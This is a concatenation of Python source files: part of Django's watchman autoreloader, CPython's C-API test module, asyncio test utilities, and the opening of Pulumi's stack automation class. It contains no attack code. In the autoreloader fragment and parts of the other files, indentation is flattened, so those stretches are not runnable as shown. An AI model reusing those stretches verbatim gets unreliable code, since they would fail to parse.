logger.warning('Unable to watch directory %s as neither it or its parent exist.', directory)
return
prefix = 'files-parent-%s' % directory.name
filenames = ['%s/%s' % (directory.name, filename) for filename in filenames]
directory = directory.parent
expression = ['name', filenames, 'wholename']
else:
prefix = 'files'
expression = ['name', filenames]
self._subscribe(directory, '%s:%s' % (prefix, directory), expression)
def _watch_glob(self, directory, patterns):
"""
Watch a directory with a specific glob. If the directory doesn't yet
exist, attempt to watch the parent directory and amend the patterns to
include this. It's important this method isn't called more than one per
directory when updating all subscriptions. Subsequent calls will
overwrite the named subscription, so it must include all possible glob
expressions.
"""
prefix = 'glob'
if not directory.exists():
if not directory.parent.exists():
logger.warning('Unable to watch directory %s as neither it or its parent exist.', directory)
return
prefix = 'glob-parent-%s' % directory.name
patterns = ['%s/%s' % (directory.name, pattern) for pattern in patterns]
directory = directory.parent
expression = ['anyof']
for pattern in patterns:
expression.append(['match', pattern, 'wholename'])
self._subscribe(directory, '%s:%s' % (prefix, directory), expression)
def watched_roots(self, watched_files):
extra_directories = self.directory_globs.keys()
watched_file_dirs = [f.parent for f in watched_files]
sys_paths = list(sys_path_directories())
return frozenset((*extra_directories, *watched_file_dirs, *sys_paths))
def _update_watches(self):
watched_files = list(self.watched_files(include_globs=False))
found_roots = common_roots(self.watched_roots(watched_files))
logger.debug('Watching %s files', len(watched_files))
logger.debug('Found common roots: %s', found_roots)
# Setup initial roots for performance, shortest roots first.
for root in sorted(found_roots):
self._watch_root(root)
for directory, patterns in self.directory_globs.items():
self._watch_glob(directory, patterns)
# Group sorted watched_files by their parent directory.
sorted_files = sorted(watched_files, key=lambda p: p.parent)
for directory, group in itertools.groupby(sorted_files, key=lambda p: p.parent):
# These paths need to be relative to the parent directory.
self._subscribe_dir(directory, [str(p.relative_to(directory)) for p in group])
def update_watches(self):
try:
self._update_watches()
except Exception as ex:
# If the service is still available, raise the original exception.
if self.check_server_status(ex):
raise
def _check_subscription(self, sub):
subscription = self.client.getSubscription(sub)
if not subscription:
return
logger.debug('Watchman subscription %s has results.', sub)
for result in subscription:
# When using watch-project, it's not simple to get the relative
# directory without storing some specific state. Store the full
# path to the directory in the subscription name, prefixed by its
# type (glob, files).
root_directory = Path(result['subscription'].split(':', 1)[1])
logger.debug('Found root directory %s', root_directory)
for file in result.get('files', []):
self.notify_file_changed(root_directory / file)
    def request_processed(self, **kwargs):
        """Signal receiver: flag that watches should be refreshed."""
        logger.debug('Request processed. Setting update_watches event.')
        self.processed_request.set()
    def tick(self):
        """Generator driven by the reloader's main loop.

        Refreshes watches after each completed request, then blocks in
        client.receive() until watchman reports activity, dispatching any
        subscription results before yielding control back to the caller.
        """
        request_finished.connect(self.request_processed)
        self.update_watches()
        while True:
            if self.processed_request.is_set():
                self.update_watches()
                self.processed_request.clear()
            try:
                self.client.receive()
            except pywatchman.WatchmanError as ex:
                # Raises WatchmanUnavailable if the server really went away.
                self.check_server_status(ex)
            else:
                for sub in list(self.client.subs.keys()):
                    self._check_subscription(sub)
            yield
    def stop(self):
        """Close the watchman client connection, then run base-class cleanup."""
        self.client.close()
        super().stop()
    def check_server_status(self, inner_ex=None):
        """Return True if the server is available."""
        try:
            self.client.query('version')
        except Exception:
            # Server unreachable: surface the original failure as the cause.
            raise WatchmanUnavailable(str(inner_ex)) from inner_ex
        return True
    @classmethod
    def check_availability(cls):
        """Raise WatchmanUnavailable unless a usable watchman >= 4.9 responds."""
        if not pywatchman:
            raise WatchmanUnavailable('pywatchman not installed.')
        client = pywatchman.client(timeout=0.1)
        try:
            result = client.capabilityCheck()
        except Exception:
            # The service is down?
            raise WatchmanUnavailable('Cannot connect to the watchman service.')
        version = get_version_tuple(result['version'])
        # Watchman 4.9 includes multiple improvements to watching project
        # directories as well as case insensitive filesystems.
        logger.debug('Watchman version %s', version)
        if version < (4, 9):
            raise WatchmanUnavailable('Watchman 4.9 or later is required.')
def get_reloader():
    """Pick the best reloader: watchman when usable, stat-polling otherwise."""
    try:
        WatchmanReloader.check_availability()
    except WatchmanUnavailable:
        return StatReloader()
    else:
        return WatchmanReloader()
def start_django(reloader, main_func, *args, **kwargs):
    """Run main_func on a daemon thread and drive *reloader* until stopped.

    If the watchman service becomes unavailable mid-run, falls back to a
    StatReloader and keeps going.
    """
    ensure_echo_on()
    main_func = check_errors(main_func)
    # daemon=True in the constructor: Thread.setDaemon() has been deprecated
    # since Python 3.10 in favor of the daemon attribute/argument.
    django_main_thread = threading.Thread(
        target=main_func, args=args, kwargs=kwargs,
        name='django-main-thread', daemon=True,
    )
    django_main_thread.start()
    while not reloader.should_stop:
        try:
            reloader.run(django_main_thread)
        except WatchmanUnavailable as ex:
            # It's possible that the watchman service shuts down or otherwise
            # becomes unavailable. In that case, use the StatReloader.
            reloader = StatReloader()
            logger.error('Error connecting to Watchman: %s', ex)
            logger.info('Watching for file changes with %s', reloader.__class__.__name__)
def run_with_reloader(main_func, *args, **kwargs):
    """Entry point: run main_func under the autoreloader.

    The parent process re-execs itself with DJANGO_AUTORELOAD_ENV set; the
    child process actually runs main_func under a file-watching reloader.
    """
    signal.signal(signal.SIGTERM, lambda *args: sys.exit(0))
    try:
        if os.environ.get(DJANGO_AUTORELOAD_ENV) == 'true':
            # Child process: run the target with a reloader attached.
            reloader = get_reloader()
            logger.info('Watching for file changes with %s', reloader.__class__.__name__)
            start_django(reloader, main_func, *args, **kwargs)
        else:
            # Parent process: keep restarting the child until it exits cleanly.
            exit_code = restart_with_reloader()
            sys.exit(exit_code)
    except KeyboardInterrupt:
        pass
|
test_capi.py | # Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from __future__ import with_statement
import sys
import time
import random
import unittest
from test import test_support as support
try:
import thread
import threading
except ImportError:
thread = None
threading = None
# Skip this whole test module (via unittest.SkipTest) if the _testcapi
# extension module isn't available on this interpreter.
_testcapi = support.import_module('_testcapi')
class CAPITest(unittest.TestCase):
    """unittest wrapper for C-API tests needing a per-test skip decorator."""

    @support.impl_detail("Currently broken on pypy", pypy=False)
    def test_buildvalue_N(self):
        # The real assertions live in C; failures raise from the extension.
        _testcapi.test_buildvalue_N()
# Names of _testcapi tests (and of the test classes below) that are known
# not to work on PyPy; consulted by test_main() and the skip decorators.
skips = []
if support.check_impl_detail(pypy=True):
    skips += [
        'test_buildvalue_N',
        'test_capsule',
        'test_lazy_hash_inheritance',
        'test_widechar',
        'TestThreadState',
        'TestPendingCalls',
    ]
@unittest.skipUnless(threading and 'TestPendingCalls' not in skips, 'Threading required for this test.')
class TestPendingCalls(unittest.TestCase):
    """Exercise the pending-call machinery via _testcapi._pending_threadfunc."""

    def pendingcalls_submit(self, l, n):
        # Submit n pending calls; each appends to l when the interpreter
        # eventually runs it on the main thread.
        def callback():
            #this function can be interrupted by thread switching so let's
            #use an atomic operation
            l.append(None)
        for i in range(n):
            time.sleep(random.random()*0.02) #0.01 secs on average
            #try submitting callback until successful.
            #rely on regular interrupt to flush queue if we are
            #unsuccessful.
            while True:
                if _testcapi._pending_threadfunc(callback):
                    break;
    def pendingcalls_wait(self, l, n, context = None):
        #now, stick around until l[0] has grown to 10
        count = 0;
        while len(l) != n:
            #this busy loop is where we expect to be interrupted to
            #run our callbacks. Note that callbacks are only run on the
            #main thread
            if False and support.verbose:
                print "(%i)"%(len(l),),
            for i in xrange(1000):
                a = i*i
            if context and not context.event.is_set():
                continue
            count += 1
            self.assertTrue(count < 10000,
                "timeout waiting for %i callbacks, got %i"%(n, len(l)))
        if False and support.verbose:
            print "(%i)"%(len(l),)
    def test_pendingcalls_threaded(self):
        #do every callback on a separate thread
        n = 32 #total callbacks
        threads = []
        class foo(object):pass
        context = foo()
        context.l = []
        context.n = 2 #submits per thread
        context.nThreads = n // context.n
        context.nFinished = 0
        context.lock = threading.Lock()
        context.event = threading.Event()
        threads = [threading.Thread(target=self.pendingcalls_thread,
                                    args=(context,))
                   for i in range(context.nThreads)]
        with support.start_threads(threads):
            self.pendingcalls_wait(context.l, n, context)
    def pendingcalls_thread(self, context):
        try:
            self.pendingcalls_submit(context.l, context.n)
        finally:
            with context.lock:
                context.nFinished += 1
                nFinished = context.nFinished
                if False and support.verbose:
                    print "finished threads: ", nFinished
        if nFinished == context.nThreads:
            context.event.set()
    def test_pendingcalls_non_threaded(self):
        #again, just using the main thread, likely they will all be dispatched at
        #once. It is ok to ask for too many, because we loop until we find a slot.
        #the loop can be interrupted to dispatch.
        #there are only 32 dispatch slots, so we go for twice that!
        l = []
        n = 64
        self.pendingcalls_submit(l, n)
        self.pendingcalls_wait(l, n)
@unittest.skipUnless(threading and thread and 'TestThreadState' not in skips, 'Threading required for this test.')
class TestThreadState(unittest.TestCase):
    """Exercise thread-state handling via _testcapi._test_thread_state."""

    @support.reap_threads
    def test_thread_state(self):
        # some extra thread-state tests driven via _testcapi
        def target():
            idents = []
            def callback():
                idents.append(thread.get_ident())
            _testcapi._test_thread_state(callback)
            # a and b keep extra references to callback alive.
            a = b = callback
            time.sleep(1)
            # Check our main thread is in the list exactly 3 times.
            self.assertEqual(idents.count(thread.get_ident()), 3,
                             "Couldn't find main thread correctly in the list")
        # Run the check on the current thread and again on a fresh thread.
        target()
        t = threading.Thread(target=target)
        t.start()
        t.join()
def test_main():
    """Run every exported _testcapi test function, then the unittest classes."""
    for name in dir(_testcapi):
        if name.startswith('test_') and name not in skips:
            test = getattr(_testcapi, name)
            if support.verbose:
                print "internal", name
            try:
                test()
            except _testcapi.error:
                raise support.TestFailed, sys.exc_info()[1]
    support.run_unittest(CAPITest, TestPendingCalls, TestThreadState)
# Allow running this file directly as a script.
if __name__ == "__main__":
    test_main()
|
utils.py | """Utilities shared by tests."""
import collections
import contextlib
import io
import logging
import os
import re
import selectors
import socket
import socketserver
import sys
import tempfile
import threading
import time
import unittest
import weakref
from unittest import mock
from http.server import HTTPServer
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from asyncio import base_events
from asyncio import events
from asyncio import format_helpers
from asyncio import futures
from asyncio import tasks
from asyncio.log import logger
from test import support
def data_file(filename):
    """Locate *filename* among the test data directories; raise if absent."""
    candidates = []
    if hasattr(support, 'TEST_HOME_DIR'):
        candidates.append(os.path.join(support.TEST_HOME_DIR, filename))
    candidates.append(os.path.join(os.path.dirname(__file__), filename))
    for fullname in candidates:
        if os.path.isfile(fullname):
            return fullname
    raise FileNotFoundError(filename)
# Certificate/key fixtures shipped alongside the test suite.
ONLYCERT = data_file('ssl_cert.pem')  # certificate without its key
ONLYKEY = data_file('ssl_key.pem')    # key without its certificate
SIGNED_CERTFILE = data_file('keycert3.pem')
SIGNING_CA = data_file('pycacert.pem')
# NOTE(review): appears to mirror the peer-certificate dict for the signed
# cert (SSLSocket.getpeercert()-style structure) — confirm against consumers.
PEERCERT = {
    'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
    'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
    'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
    'issuer': ((('countryName', 'XY'),),
               (('organizationName', 'Python Software Foundation CA'),),
               (('commonName', 'our-ca-server'),)),
    'notAfter': 'Jul 7 14:23:16 2028 GMT',
    'notBefore': 'Aug 29 14:23:16 2018 GMT',
    'serialNumber': 'CB2D80995A69525C',
    'subject': ((('countryName', 'XY'),),
                (('localityName', 'Castle Anthrax'),),
                (('organizationName', 'Python Software Foundation'),),
                (('commonName', 'localhost'),)),
    'subjectAltName': (('DNS', 'localhost'),),
    'version': 3
}
def simple_server_sslcontext():
    """Server-side TLS context using the test cert/key, verification disabled."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_cert_chain(ONLYCERT, ONLYKEY)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return ctx
def simple_client_sslcontext(*, disable_verify=True):
    """Client-side TLS context; certificate verification off by default."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    if disable_verify:
        ctx.verify_mode = ssl.CERT_NONE
    return ctx
def dummy_ssl_context():
    """Return a generic TLS context, or None when the ssl module is missing."""
    return None if ssl is None else ssl.SSLContext(ssl.PROTOCOL_TLS)
def run_briefly(loop):
    """Run *loop* just long enough to complete one no-op task."""
    async def once():
        pass
    coro = once()
    task = loop.create_task(coro)
    # Suppress "task was destroyed" logging if the loop is stopped early or
    # the task dies with a BaseException.
    task._log_destroy_pending = False
    try:
        loop.run_until_complete(task)
    finally:
        coro.close()
def run_until(loop, pred, timeout=30):
    """Spin *loop* in 1ms sleeps until pred() is true; time out after *timeout*s."""
    deadline = time.time() + timeout
    while not pred():
        if timeout is not None:
            remaining = deadline - time.time()
            if remaining <= 0:
                raise futures.TimeoutError()
            timeout = remaining
        loop.run_until_complete(tasks.sleep(0.001))
def run_once(loop):
    """Legacy helper: poll the selector once and run every ready callback.

    Scheduling stop() before run_forever() guarantees exactly one pass.
    """
    loop.call_soon(loop.stop)
    loop.run_forever()
class SilentWSGIRequestHandler(WSGIRequestHandler):
    """WSGI request handler that discards all of its logging output."""

    def get_stderr(self):
        # Route handler tracebacks into a throwaway buffer.
        return io.StringIO()

    def log_message(self, format, *args):
        # Deliberately silent.
        pass
class SilentWSGIServer(WSGIServer):
    """WSGI server that times out idle connections and swallows handler errors."""

    # Per-connection socket timeout, in seconds.
    request_timeout = 2

    def get_request(self):
        request, client_addr = super().get_request()
        request.settimeout(self.request_timeout)
        return request, client_addr

    def handle_error(self, request, client_address):
        # Deliberately silent: tests exercise error paths on purpose.
        pass
class SSLWSGIServerMixin:
    """Mixin that TLS-wraps each accepted connection before handling it."""

    def finish_request(self, request, client_address):
        # The relative location of our test directory (which
        # contains the ssl key and certificate files) differs
        # between the stdlib and stand-alone asyncio.
        # Prefer our own if we can find it.
        here = os.path.join(os.path.dirname(__file__), '..', 'tests')
        if not os.path.isdir(here):
            here = os.path.join(os.path.dirname(os.__file__),
                                'test', 'test_asyncio')
        keyfile = os.path.join(here, 'ssl_key.pem')
        certfile = os.path.join(here, 'ssl_cert.pem')
        context = ssl.SSLContext()
        context.load_cert_chain(certfile, keyfile)
        ssock = context.wrap_socket(request, server_side=True)
        try:
            self.RequestHandlerClass(ssock, client_address, self)
            ssock.close()
        except OSError:
            # maybe socket has been closed by peer
            pass
class SSLWSGIServer(SSLWSGIServerMixin, SilentWSGIServer):
    # TCP variant of the silent WSGI server with TLS wrapping mixed in.
    pass
def _run_test_server(*, address, use_ssl=False, server_cls, server_ssl_cls):
    """Generator: start a trivial WSGI server on a thread, yield it, tear down.

    Driven by the run_test_server()/run_test_unix_server() context managers.
    """
    def app(environ, start_response):
        # Minimal WSGI app: always 200 with a fixed body.
        status = '200 OK'
        headers = [('Content-type', 'text/plain')]
        start_response(status, headers)
        return [b'Test message']
    # Run the test WSGI server in a separate thread in order not to
    # interfere with event handling in the main thread
    server_class = server_ssl_cls if use_ssl else server_cls
    httpd = server_class(address, SilentWSGIRequestHandler)
    httpd.set_app(app)
    httpd.address = httpd.server_address
    server_thread = threading.Thread(
        target=lambda: httpd.serve_forever(poll_interval=0.05))
    server_thread.start()
    try:
        yield httpd
    finally:
        httpd.shutdown()
        httpd.server_close()
        server_thread.join()
if hasattr(socket, 'AF_UNIX'):
    # Unix-domain variants of the HTTP/WSGI test servers above.

    class UnixHTTPServer(socketserver.UnixStreamServer, HTTPServer):

        def server_bind(self):
            socketserver.UnixStreamServer.server_bind(self)
            # Fake host/port metadata: HTTPServer expects TCP-style values.
            self.server_name = '127.0.0.1'
            self.server_port = 80

    class UnixWSGIServer(UnixHTTPServer, WSGIServer):

        # Per-connection socket timeout, in seconds.
        request_timeout = 2

        def server_bind(self):
            UnixHTTPServer.server_bind(self)
            self.setup_environ()

        def get_request(self):
            request, client_addr = super().get_request()
            request.settimeout(self.request_timeout)
            # Code in the stdlib expects that get_request
            # will return a socket and a tuple (host, port).
            # However, this isn't true for UNIX sockets,
            # as the second return value will be a path;
            # hence we return some fake data sufficient
            # to get the tests going
            return request, ('127.0.0.1', '')

    class SilentUnixWSGIServer(UnixWSGIServer):

        def handle_error(self, request, client_address):
            # Deliberately silent.
            pass

    class UnixSSLWSGIServer(SSLWSGIServerMixin, SilentUnixWSGIServer):
        pass
def gen_unix_socket_path():
    """Return a fresh filesystem path suitable for a unix-domain socket.

    NOTE(review): the temp file is deleted on return, so there is a small
    window in which another process could claim the same name.
    """
    with tempfile.NamedTemporaryFile() as tmp:
        return tmp.name
@contextlib.contextmanager
def unix_socket_path():
    """Yield a temporary unix-socket path, unlinking it (if any) on exit."""
    path = gen_unix_socket_path()
    try:
        yield path
    finally:
        with contextlib.suppress(OSError):
            os.unlink(path)
@contextlib.contextmanager
def run_test_unix_server(*, use_ssl=False):
    """Context manager: serve the test WSGI app on a temporary unix socket."""
    with unix_socket_path() as path:
        yield from _run_test_server(address=path, use_ssl=use_ssl,
                                    server_cls=SilentUnixWSGIServer,
                                    server_ssl_cls=UnixSSLWSGIServer)
@contextlib.contextmanager
def run_test_server(*, host='127.0.0.1', port=0, use_ssl=False):
    """Context manager: serve the test WSGI app over TCP (port 0 = ephemeral)."""
    yield from _run_test_server(address=(host, port), use_ssl=use_ssl,
                                server_cls=SilentWSGIServer,
                                server_ssl_cls=SSLWSGIServer)
def make_test_protocol(base):
    """Instantiate a mock protocol exposing every non-dunder API of *base*."""
    namespace = {
        name: MockCallback(return_value=None)
        for name in dir(base)
        # skip magic names
        if not (name.startswith('__') and name.endswith('__'))
    }
    return type('TestProtocol', (base,) + base.__bases__, namespace)()
class TestSelector(selectors.BaseSelector):
    """Inert selector: records (un)registrations, never reports I/O events."""

    def __init__(self):
        # fileobj -> SelectorKey
        self.keys = {}

    def register(self, fileobj, events, data=None):
        # fd slot is unused by the test loop, so it is fixed at 0.
        key = selectors.SelectorKey(fileobj, 0, events, data)
        self.keys[fileobj] = key
        return key

    def unregister(self, fileobj):
        return self.keys.pop(fileobj)

    def select(self, timeout):
        # Nothing ever becomes ready.
        return []

    def get_map(self):
        return self.keys
class TestLoop(base_events.BaseEventLoop):
    """Loop for unittests.

    It manages "self time" directly: when something is scheduled for later,
    then on the next loop iteration (after all ready handlers are done) the
    generator passed to __init__ is called. It should look like this:

        def gen():
            ...
            when = yield ...
            ... = yield time_advance

    The value returned by yield is the absolute time of the next scheduled
    handler. The value passed to yield is the time advance by which to move
    the loop's clock forward.
    """

    def __init__(self, gen=None):
        super().__init__()
        if gen is None:
            # No time generator supplied: use an inert one and skip the
            # exhaustion check in close().
            def gen():
                yield
            self._check_on_close = False
        else:
            self._check_on_close = True
        self._gen = gen()
        next(self._gen)  # prime the generator
        self._time = 0
        self._clock_resolution = 1e-9
        self._timers = []  # absolute deadlines passed to call_at()
        self._selector = TestSelector()
        self.readers = {}  # fd -> events.Handle
        self.writers = {}  # fd -> events.Handle
        self.reset_counters()
        self._transports = weakref.WeakValueDictionary()

    def time(self):
        # Manually-advanced virtual clock.
        return self._time

    def advance_time(self, advance):
        """Move test time forward."""
        if advance:
            self._time += advance

    def close(self):
        super().close()
        if self._check_on_close:
            try:
                self._gen.send(0)
            except StopIteration:
                pass
            else:  # pragma: no cover
                raise AssertionError("Time generator is not finished")

    def _add_reader(self, fd, callback, *args):
        self.readers[fd] = events.Handle(callback, args, self, None)

    def _remove_reader(self, fd):
        self.remove_reader_count[fd] += 1
        if fd in self.readers:
            del self.readers[fd]
            return True
        else:
            return False

    def assert_reader(self, fd, callback, *args):
        # Verify fd is registered with exactly this callback and args.
        if fd not in self.readers:
            raise AssertionError(f'fd {fd} is not registered')
        handle = self.readers[fd]
        if handle._callback != callback:
            raise AssertionError(
                f'unexpected callback: {handle._callback} != {callback}')
        if handle._args != args:
            raise AssertionError(
                f'unexpected callback args: {handle._args} != {args}')

    def assert_no_reader(self, fd):
        if fd in self.readers:
            raise AssertionError(f'fd {fd} is registered')

    def _add_writer(self, fd, callback, *args):
        self.writers[fd] = events.Handle(callback, args, self, None)

    def _remove_writer(self, fd):
        self.remove_writer_count[fd] += 1
        if fd in self.writers:
            del self.writers[fd]
            return True
        else:
            return False

    def assert_writer(self, fd, callback, *args):
        assert fd in self.writers, 'fd {} is not registered'.format(fd)
        handle = self.writers[fd]
        assert handle._callback == callback, '{!r} != {!r}'.format(
            handle._callback, callback)
        assert handle._args == args, '{!r} != {!r}'.format(
            handle._args, args)

    def _ensure_fd_no_transport(self, fd):
        # Reject fds that are still owned by a live transport.
        if not isinstance(fd, int):
            try:
                fd = int(fd.fileno())
            except (AttributeError, TypeError, ValueError):
                # This code matches selectors._fileobj_to_fd function.
                raise ValueError("Invalid file object: "
                                 "{!r}".format(fd)) from None
        try:
            transport = self._transports[fd]
        except KeyError:
            pass
        else:
            raise RuntimeError(
                'File descriptor {!r} is used by transport {!r}'.format(
                    fd, transport))

    def add_reader(self, fd, callback, *args):
        """Add a reader callback."""
        self._ensure_fd_no_transport(fd)
        return self._add_reader(fd, callback, *args)

    def remove_reader(self, fd):
        """Remove a reader callback."""
        self._ensure_fd_no_transport(fd)
        return self._remove_reader(fd)

    def add_writer(self, fd, callback, *args):
        """Add a writer callback.."""
        self._ensure_fd_no_transport(fd)
        return self._add_writer(fd, callback, *args)

    def remove_writer(self, fd):
        """Remove a writer callback."""
        self._ensure_fd_no_transport(fd)
        return self._remove_writer(fd)

    def reset_counters(self):
        # Per-fd counts of remove_reader/remove_writer calls.
        self.remove_reader_count = collections.defaultdict(int)
        self.remove_writer_count = collections.defaultdict(int)

    def _run_once(self):
        super()._run_once()
        # Feed each scheduled deadline to the time generator and advance the
        # virtual clock by whatever it yields back.
        for when in self._timers:
            advance = self._gen.send(when)
            self.advance_time(advance)
        self._timers = []

    def call_at(self, when, callback, *args, context=None):
        self._timers.append(when)
        return super().call_at(when, callback, *args, context=context)

    def _process_events(self, event_list):
        # TestSelector never produces events; nothing to do.
        return

    def _write_to_self(self):
        pass
def MockCallback(**kwargs):
    """Return a Mock restricted to being called, configured via **kwargs."""
    return mock.Mock(spec=['__call__'], **kwargs)
class MockPattern(str):
    """String subclass whose equality is a DOTALL regex search.

    Handy with 'mock.assert_called_with', or anywhere a fuzzy string
    comparison is needed, e.g.:

        mock_call.assert_called_with(MockPattern('spam.*ham'))
    """

    def __eq__(self, other):
        match = re.search(str(self), other, re.S)
        return match is not None
class MockInstanceOf:
    """Equality helper: compares equal to any instance of the wrapped type."""

    def __init__(self, type):
        self._type = type

    def __eq__(self, other):
        # isinstance check instead of value equality.
        return isinstance(other, self._type)
def get_function_source(func):
    """Return the (filename, firstlineno) source location of *func*.

    Raises ValueError when the location cannot be determined.
    """
    source = format_helpers._get_function_source(func)
    if source is not None:
        return source
    raise ValueError("unable to get the source of %r" % (func,))
class TestCase(unittest.TestCase):
    """Base TestCase for asyncio tests: event-loop bookkeeping and cleanup."""

    @staticmethod
    def close_loop(loop):
        # Drain the default executor before closing so worker threads exit.
        executor = loop._default_executor
        if executor is not None:
            executor.shutdown(wait=True)
        loop.close()

    def set_event_loop(self, loop, *, cleanup=True):
        assert loop is not None
        # ensure that the event loop is passed explicitly in asyncio
        events.set_event_loop(None)
        if cleanup:
            self.addCleanup(self.close_loop, loop)

    def new_test_loop(self, gen=None):
        # Create a TestLoop (optionally time-driven by *gen*) and install it.
        loop = TestLoop(gen)
        self.set_event_loop(loop)
        return loop

    def unpatch_get_running_loop(self):
        events._get_running_loop = self._get_running_loop

    def setUp(self):
        # Patch out the running-loop accessor so tests must pass loops
        # explicitly; restored in tearDown().
        self._get_running_loop = events._get_running_loop
        events._get_running_loop = lambda: None
        self._thread_cleanup = support.threading_setup()

    def tearDown(self):
        self.unpatch_get_running_loop()
        events.set_event_loop(None)
        # Detect CPython bug #23353: ensure that yield/yield-from is not used
        # in an except block of a generator
        self.assertEqual(sys.exc_info(), (None, None, None))
        self.doCleanups()
        support.threading_cleanup(*self._thread_cleanup)
        support.reap_children()
@contextlib.contextmanager
def disable_logger():
    """Context manager to disable asyncio logger.

    For example, it can be used to ignore warnings in debug mode.
    """
    saved_level = logger.level
    logger.setLevel(logging.CRITICAL + 1)
    try:
        yield
    finally:
        logger.setLevel(saved_level)
def mock_nonblocking_socket(proto=socket.IPPROTO_TCP, type=socket.SOCK_STREAM,
                            family=socket.AF_INET):
    """Create a mock of a non-blocking socket with the given fixed metadata."""
    sock = mock.MagicMock(socket.socket)
    sock.proto, sock.type, sock.family = proto, type, family
    sock.gettimeout.return_value = 0.0  # 0.0 == non-blocking
    return sock
|
_stack.py | # Copyright 2016-2021, Pulumi Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import tempfile
import time
import threading
from concurrent import futures
from enum import Enum
from datetime import datetime
from typing import List, Any, Mapping, MutableMapping, Optional, Callable, Tuple
import grpc
from ._cmd import CommandResult, _run_pulumi_cmd, OnOutput
from ._config import ConfigValue, ConfigMap
from .errors import StackAlreadyExistsError
from .events import OpMap, EngineEvent, SummaryEvent
from ._output import OutputMap
from ._server import LanguageServer
from ._workspace import Workspace, PulumiFn, Deployment
from ..runtime.settings import _GRPC_CHANNEL_OPTIONS
from ..runtime.proto import language_pb2_grpc
# Timestamp layout used in update metadata (UTC with a literal "Z" suffix).
_DATETIME_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'
# Callback invoked for each structured engine event streamed from the CLI.
OnEvent = Callable[[EngineEvent], Any]
class ExecKind(str, Enum):
    """How the CLI executes the program: a local project or an inline function."""

    LOCAL = "auto.local"
    INLINE = "auto.inline"
class StackInitMode(Enum):
    """How Stack.__init__ obtains the underlying stack."""

    CREATE = "create"
    SELECT = "select"
    CREATE_OR_SELECT = "create_or_select"
class UpdateSummary:
    """Metadata describing one stack update as reported by the Pulumi CLI."""

    def __init__(self,
                 # pre-update info
                 kind: str,
                 start_time: datetime,
                 message: str,
                 environment: Mapping[str, str],
                 config: Mapping[str, dict],
                 # post-update info
                 result: str,
                 end_time: datetime,
                 version: Optional[int] = None,
                 deployment: Optional[str] = None,
                 resource_changes: Optional[OpMap] = None):
        self.kind = kind
        self.start_time = start_time
        self.end_time = end_time
        self.message = message
        self.environment = environment
        self.result = result
        self.Deployment = deployment
        self.resource_changes = resource_changes
        self.version = version
        # Re-hydrate the raw config entries into ConfigValue objects.
        self.config: ConfigMap = {
            key: ConfigValue(value=raw["value"], secret=raw["secret"])
            for key, raw in config.items()
        }

    def __repr__(self):
        return f"UpdateSummary(result={self.result!r}, version={self.version!r}, " \
               f"start_time={self.start_time!r}, end_time={self.end_time!r}, kind={self.kind!r}, " \
               f"message={self.message!r}, environment={self.environment!r}, " \
               f"resource_changes={self.resource_changes!r}, config={self.config!r}, Deployment={self.Deployment!r})"
class BaseResult:
    """Common stdout/stderr carrier for the results of Pulumi operations."""

    def __init__(self, stdout: str, stderr: str):
        self.stdout = stdout
        self.stderr = stderr

    def __repr__(self):
        # Render every instance attribute, in insertion order.
        fields = ", ".join(  # pylint: disable=consider-using-dict-items
            f"{name}={value!r}" for name, value in self.__dict__.items()
        )
        return f"{self.__class__.__name__}({fields})"
class PreviewResult(BaseResult):
    """Result of a preview: stdout/stderr plus the planned resource changes."""

    def __init__(self, stdout: str, stderr: str, change_summary: OpMap):
        super().__init__(stdout, stderr)
        # Map of operation type -> count, extracted from the SummaryEvent.
        self.change_summary = change_summary
class UpResult(BaseResult):
    """Result of an update: adds the stack outputs and the update summary."""

    def __init__(self, stdout: str, stderr: str, summary: UpdateSummary, outputs: OutputMap):
        super().__init__(stdout, stderr)
        self.outputs = outputs
        self.summary = summary
class RefreshResult(BaseResult):
    """Result of a refresh: stdout/stderr plus the update summary."""

    def __init__(self, stdout: str, stderr: str, summary: UpdateSummary):
        super().__init__(stdout, stderr)
        self.summary = summary
class DestroyResult(BaseResult):
    """Result of a destroy: stdout/stderr plus the update summary."""

    def __init__(self, stdout: str, stderr: str, summary: UpdateSummary):
        super().__init__(stdout, stderr)
        self.summary = summary
class Stack:
@classmethod
def create(cls, stack_name: str, workspace: Workspace) -> 'Stack':
"""
Creates a new stack using the given workspace, and stack name.
It fails if a stack with that name already exists.
:param stack_name: The name identifying the Stack
:param workspace: The Workspace the Stack was created from.
:return: Stack
"""
return Stack(stack_name, workspace, StackInitMode.CREATE)
@classmethod
def select(cls, stack_name: str, workspace: Workspace) -> 'Stack':
"""
Selects stack using the given workspace, and stack name.
It returns an error if the given Stack does not exist.
:param stack_name: The name identifying the Stack
:param workspace: The Workspace the Stack was created from.
:return: Stack
"""
return Stack(stack_name, workspace, StackInitMode.SELECT)
@classmethod
def create_or_select(cls, stack_name: str, workspace: Workspace) -> 'Stack':
"""
Tries to create a new stack using the given workspace and stack name if the stack does not already exist,
or falls back to selecting the existing stack. If the stack does not exist,
it will be created and selected.
:param stack_name: The name identifying the Stack
:param workspace: The Workspace the Stack was created from.
:return: Stack
"""
return Stack(stack_name, workspace, StackInitMode.CREATE_OR_SELECT)
    def __init__(self, name: str, workspace: Workspace, mode: StackInitMode) -> None:
        """
        Stack is an isolated, independently configurable instance of a Pulumi program.
        Stack exposes methods for the full pulumi lifecycle (up/preview/refresh/destroy), as well as managing configuration.
        Multiple Stacks are commonly used to denote different phases of development
        (such as development, staging and production) or feature branches (such as feature-x-dev, jane-feature-x-dev).

        :param name: The name identifying the Stack.
